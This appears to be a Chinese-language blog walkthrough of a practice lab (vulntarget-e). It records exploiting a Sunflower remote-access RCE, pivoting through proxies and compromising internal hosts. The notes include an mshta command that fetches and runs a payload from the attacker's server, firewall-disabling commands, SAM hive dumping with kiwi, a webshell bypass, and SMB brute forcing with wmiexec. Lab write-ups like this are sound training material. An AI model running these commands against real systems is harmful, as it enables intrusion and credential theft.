vulntarget-e内网靶场笔记

vulntarget-e

一.打靶过程

1.外网打点

向日葵rce

nmap -T4 -sV -O -p 0-65535 192.168.126.130
1666280588934.png
访问了49773端口后只有这个页面,只能扫描一下目录看看,但是扫出来也都是跳转到这个页面
扫一下指纹信息,发现是向日葵(这里我自己扫不出来,俊贤哥说向日葵端口是变化的的自己写识别)image.png
未授权的路径:/cgi-bin/rpc 授权的路径 /cgi-bin/login.cgiimage

确实存在漏洞,直接工具
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
image.pngimage.png

window下载木马

开启python传输后
mshta http://xxxx.xxx.xxx.xx:8000/1.hta
此命令直接下载和自动执行
image.png

进程迁移

run post/windows/manage/migrate
image.png
再添加个路由

msf返回乱码问题

shell输入chcp 65001即可

2.外网win机信息收集

net time一下,不在域内,并且查看了内网的ip
image.png

翻文件

查看桌面文件,一个一个目录从c盘根目录开始找
1666613748986.png

download的坑(win和linux目录斜杠区别)

image.png
1666619909608.png
window用\或者/
linux用\

arp收集内网ip

1666618400090.png
192.168.100.131

kiwi的坑(抓密码)

kiwi只有administrator权限还不够,得执行getsystem,用system权限跑
1666619124894.png
1666619435821.png
发现只能读取到管理员用户的hash,解密后的密码是 win2008,目前还需要读取普通用户的hash,为的是方便为了做爆破的时候做字典,既然这样不能读取,直接抓下来本地读取
命令行
reg save hklm\sam sam.hive
reg save hklm\system system.hive  
使用kiwi的lsa_dump_sam
image.png

3.探测内网Ubuntu主机

先把win2016防火墙关了

netsh Firewall show state  #查看防火墙状态
netsh advfirewall set allprofiles state off 关闭防火墙

挂上代理,配置proxychain4
use auxiliary/server/socks_proxy
run
vim /etc/proxychains4.conf

代理nmap扫描内网主机
proxychains4 nmap -Pn -T4 -sT -p- 192.168.100.131
1666667642548.png

访问80端口发现400
1666667803244.png访问8888端口,可以看到是宝塔的
image

开启dirsearch扫目录
image.png
发现一直400,这时候就想到了前面收集到的域名地址
并且桌面还有个firefox,看看有没有浏览器历史记录

查看浏览器记录

run post/windows/gather/forensics/browser_history
1666668394740.png
在路径里找到文件右键用sqlite打开
1666672829960.png
轮流访问一下
image
都是400,应该是需要host碰撞

host碰撞

很多时候访问目标资产响应多为: 401、403、404、500,但是用域名请求却能返回正常的业务系统,因为这大多数 都是需要绑定host才能正常请求访问的 (目前互联网公司基本的做法),那么我 们就可以通过收集到的目标的内网域名和 目标资产的IP段组合起来,以IP段+域名的 形式进行捆绑碰撞,就能发现很多有意思 的东西。这一操作可以通过脚本自动化来 访问:
https://github.com/r35tart/Hosts_scan
要走proxychain代理去跑工具
跑完工具后利用火狐的modheader拓展修改host访问浏览器历史翻到的路径1666858269353.png
成功访问到后发现是thinkphp,直接rce,但我这边靶场出现意外,这一步直接跳过,在靶机上写个一句话连接

获取linux位数命令

getconf LONG_BIT

bypass disable function(蚁剑的解码器)

很烦这里卡了好久,phpinfo看了一眼disable function,都被禁了除了eval
原来是wp一句话写了三次的编码,所以要用他三次解码的蚁剑的解码器,自定义的这里image.pngimage.png
这里很奇怪,不用url编码解码器连接就一直超时

这里的bypass很奇怪,用脚本也一直不行,然后蚁剑所有bypass的功能试了一遍又突然就可以了,只能说玄学

proxychain打开msf

可以命令执行之后就上线msf,这里直接使用proxychains代理打开msf,就不用做什么代理转发上线了image.png

ssh利用key免密登录提权

proxychains ssh -i key root@192.168.100.131
image.png
netstat -an|grep:22可以看22端口连接情况,输入who查看用户信息
1667144238097.png

代理通过两个跳板机扫描

frp搭建多层代理

https://moments.blog.csdn.net/article/details/127190123?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EYuanLiJiHua%7EPosition-1-127190123-blog-106697369.pc_relevant_landingrelevant&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EYuanLiJiHua%7EPosition-1-127190123-blog-106697369.pc_relevant_landingrelevant&utm_relevant_index=1

image.png

image.png

九头蛇爆破smb445端口

image.png

wmiexec登录smb执行命令

image.png

smbclient登录smb

image.png
put命令传输文件,把文件放在wmmiexec目录下image.png
当时大二打这个靶场环境有点问题,做到这停了,后面有机会补上

posted @ 2024-03-29 11:17  小新07  阅读(87)  评论(0编辑  收藏  举报